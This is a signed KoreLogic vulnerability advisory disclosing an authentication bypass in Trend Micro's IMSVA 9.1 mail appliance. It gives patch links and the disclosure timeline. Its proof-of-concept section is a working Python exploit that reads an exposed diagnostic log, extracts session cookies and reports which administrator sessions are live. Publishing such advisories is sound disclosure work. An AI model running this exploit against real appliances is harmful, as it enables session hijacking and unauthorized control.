-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

KL-001-2018-006 : Trend Micro IMSVA Management Portal Authentication Bypass

Title: Trend Micro IMSVA Management Portal Authentication Bypass
Advisory ID: KL-001-2018-006
Publication Date: 2018.02.08
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-006.txt


1. Vulnerability Details

     Affected Vendor: Trend Micro
     Affected Product: InterScan Mail Security Virtual Apppliance
     Affected Version: 9.1.0.1600
     Platform: Embedded Linux
     CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-219: Sensitive Data Under Web Root
     Impact: Authentication Bypass
     Attack vector: HTTPS

2. Vulnerability Description

     Any unauthenticated user can bypass the authentication process.

3. Technical Description

     The web application is plugin-based and allows widgets to
     be loaded into the application. A plugin which is loaded by
     default stores a log file of events in a directory which can be
     accessed by unauthenticated users. Files within this directory
     (such as /widget/repository/log/diagnostic.log) which contain
     cookie values can then be read, parsed, and session information
     extracted. A functional exploit is shown below.

4. Mitigation and Remediation Recommendation

     Trend Micro has released a Critical Patch update to the
     affected versions for this vulnerability. The advisory and
     links to the patch(es) are available from the following URL:

     https://success.trendmicro.com/solution/1119277

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2017.08.11 - KoreLogic submits vulnerability details to Trend Micro.
     2017.08.11 - Trend Micro confirms receipt.
     2017.09.15 - KoreLogic asks for an update on the triage of the
                  reported issue.
     2017.09.15 - Trend Micro informs KoreLogic that the issue is in
                  remediation but there is no expected release date yet.
     2017.09.25 - 30 business days have elapsed since the vulnerability
                  was reported to Trend Micro.
     2017.10.06 - Trend Micro informs KoreLogic that the issue will not
                  be addressed before the 45 business-day deadline. They
                  ask for additional time for the details to remain
                  embargoed in order to complete QA on the proposed fix.
     2017.10.06 - KoreLogic agrees to extend the disclosure timeline.
     2017.10.17 - 45 business days have elapsed since the vulnerability
                  was reported to Trend Micro.
     2017.11.02 - Trend Micro notifies KoreLogic that the Critical Patch
                  for IMSVA 9.1 (Critical Patch 1682) has gone live,
                  but they are still working on the patch for IMSVA 9.0.
     2017.11.07 - 60 business days have elapsed since the vulnerability
                  was reported to Trend Micro.
     2017.12.21 - 90 business days have elapsed since the vulnerability
                  was reported to Trend Micro.
     2017.12.28 - Trend Micro notifies KoreLogic that the IMSVA 9.0
                  Critical Patch is being localized for foreign language
                  customers. Expected release date is late January 2018.
     2018.01.18 - Trend Micro notifies KoreLogic that the expected release
                  date for the IMSVA 9.0 Critical Patch and the advisory
                  is to be January 31, 2018.
     2018.01.23 - 110 business days have elapsed since the vulnerability
                  was reported to Trend Micro.
     2018.01.31 - Trend Micro releases the advisory associated with this
                  vulnerability and the related Critical Patches.
     2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

#!/usr/bin/python3


from argparse import ArgumentParser
from ssl import _create_unverified_context
from time import mktime
from urllib.request import HTTPSHandler, HTTPError, Request, urlopen, build_opener


banner = '''Trendmicro IMSVA 9.1.0.1600 Management Portal Authentication Bypass
{}'''.format('-'*67)


class Exploit:
    def __init__(self, args):
        self.target_host = args.host
        self.target_port = args.port
        self.list_all = args.ls
        self.sessions = []
        self.session_latest_time = None
        self.session_latest_id = None
        self.sessions_active = []
        return None

    def is_target(self):
        url_loginpage = Request('https://{}:{}/loginPage.imss'.format(self.target_host, self.target_port))
        url_loginjsp = Request('https://{}:{}/jsp/framework/login.jsp'.format(self.target_host, self.target_port))
        if urlopen(url_loginpage, context=_create_unverified_context()).getcode() == 200:
            try:
                urlopen(url_loginjsp, context=_create_unverified_context())
            except HTTPError as e:
                if e.code == 403:
                    return True
                else:
                    return False
        return False

    def get_sessions(self):
        url_vulnpage = Request('https://{}:{}/widget/repository/log/diagnostic.log'.format(self.target_host, self.target_port))
        vuln_obj = urlopen(url_vulnpage, context=_create_unverified_context())
        if vuln_obj.getcode() == 200:
            vuln_pagedata = vuln_obj.read()
            for line in vuln_pagedata.decode('utf8').split('\n'):
                if 'product_auth' in line and 'JSEEEIONID' in line:
                    self.sessions.append((line.split(',')[0], line.split(',')[-1].split(' ')[1].split(':')[1]))
        else:
            return False
        return True

    def find_latest(self):
        for session in list(set(self.sessions)):
            year, month, day = session[0].split(' ')[0].split('-')
            hour, minute, second = session[0].split(' ')[1].split(':')
            session_time = mktime((int(year), int(month), int(day), int(hour), int(minute), int(second), 0, 0, 0))
            if self.session_latest_time is None:
                self.session_latest_time = session_time
            if session_time > self.session_latest_time:
                self.session_latest_time = session_time
                self.session_latest_id = session[1]
                if self.list_all:
                    if self.is_session_alive():
                        self.sessions_active.append((self.session_latest_time, self.session_latest_id))
        return True

    def is_session_alive(self):
        url_consolepage = Request('https://{}:{}/console.imss'.format(self.target_host, self.target_port))
        opener = build_opener(HTTPSHandler(context=_create_unverified_context()))
        opener.addheaders.append(('Cookie', 'JSESSIONID={}'.format(self.session_latest_id)))
        console_obj = opener.open(url_consolepage)
        if console_obj.getcode() == 200:
            console_pagedata = console_obj.read().decode('utf8')
            if 'parent.location.href="/timeout.imss"' in console_pagedata:
                return False
        else:
            return False
        return True

    def run(self):
        if self.is_target():
            if self.get_sessions():
                print('[-] Leaked {} sessions'.format(len(self.sessions)))
                self.find_latest()
                if self.list_all and self.sessions_active:
                    print('[+] Active sessions leaked.')
                    sessions = []
                    for entry in list(set(self.sessions_active)):
                        sessions.append(entry[1])
                    for session in list(set(sessions)):
                        print('Set-Cookie: JSESSIONID={}'.format(session))
                elif self.is_session_alive():
                    print('[+] Active session leaked.')
                    print('Set-Cookie: JSESSIONID={}'.format(self.session_latest_id))
                    return True
                else:
                    print('[-] {} sessions leaked but none are active.'.format(len(self.sessions)))
                    return False
            else:
                return False
        else:
            return False
        return False


if __name__ == '__main__':
    print(banner)
    arg_parser = ArgumentParser(add_help=False)
    arg_parser.add_argument('-H', '--help', action='help', help='Help')
    arg_parser.add_argument('-h', '--host', default=None, required=True, help='Target host')
    arg_parser.add_argument('-p', '--port', default=8445, type=int, help='Target port')
    arg_parser.add_argument('-l', '--ls', action='store_true', default=False, help='List all sessions (noisy)')

    args = arg_parser.parse_args()

    Exploit(args).run()


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-----BEGIN PGP SIGNATURE-----

iQFOBAEBCAA4FiEE+cSrtp5jQJEtra70TWWaLA4ZiQwFAlp88wYaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQTWWaLA4ZiQzz3gf+K1kJ4xDYF1O5QUKZcugw
uzQt5Y00pppL+RmukhTSXtDdwZubfkTWjGo4X22rxYXsuHlgWo6ObcjmWYxCSHQh
q7F13nWmnTO+Zgg9fVwjk+HxLzGnoB5U4sVMgmjAZJAXL9ASOfkKd7DNpJYz5CrK
eIV29jyNJyfglBcJ9fuT/HovCvSn7zfwYRFAdr5DMkVilZA6tYAYZGQZwp3wlHsr
jQtWVC9+qO5zWhVmWjwqznr06wWXU+yaPW7ZgcrZ22jsOyB4LwQVaBbANZQdzuMm
j3gjXcRrfcy9O/PN1HvKj1II2c+92+bYhXyEgk+rLpQuSRYrU3ox6hkVs9NcuAiv
gQ==
=nzcU
-----END PGP SIGNATURE-----